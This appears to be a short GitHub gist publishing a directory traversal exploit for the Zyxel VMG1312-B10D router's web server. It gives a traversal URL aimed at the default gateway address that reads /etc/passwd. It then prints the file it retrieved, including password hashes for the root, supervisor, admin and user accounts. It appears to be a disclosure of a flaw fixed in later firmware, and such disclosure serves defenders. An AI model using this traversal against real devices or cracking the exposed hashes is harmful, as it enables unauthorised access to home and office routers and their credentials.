/Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
Last active Nov 17, 2018
Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access - Details
# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0 | |
# Date: 2018-11-17 | |
# Exploit Author: numan türle @numanturle | |
# Vendor Homepage: https://www.zyxel.com/ | |
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/ | |
# Tested on: macOS | |
# Fixed firmware: 5.13(AAXA.8)C0 | |
@modem_gateway = "192.168.1.1" // default address | |
http://@modem_gateway/../../../../../../../../../../../../etc/passwd | |
here are the contents : | |
############################## contents ############################## | |
nobody:x:99:99:nobody:/nonexistent:/bin/false | |
root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh | |
supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh | |
admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh | |
user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh | |
############################## contents ############################## |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment